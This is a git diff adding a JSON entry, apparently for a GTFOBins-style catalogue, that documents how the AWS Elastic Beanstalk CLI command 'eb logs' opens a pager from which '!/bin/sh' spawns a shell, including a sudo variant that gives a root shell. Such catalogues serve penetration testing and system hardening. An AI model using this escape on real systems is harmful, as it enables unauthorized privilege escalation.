diff --git a/data/eb.json b/data/eb.json new file mode 100644 index 0000000..50bf90e --- /dev/null +++ b/data/eb.json @@ -0,0 +1,15 @@ +{ + "description": "This invokes the default logging service, which is likely to be 'journalctl', other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.", + "functions": { + "shell": [ + { + "code": "eb logs\n!/bin/sh\n" + } + ], + "sudo": [ + { + "code": "sudo eb logs\n!/bin/sh\n" + } + ] + } +} \ No newline at end of file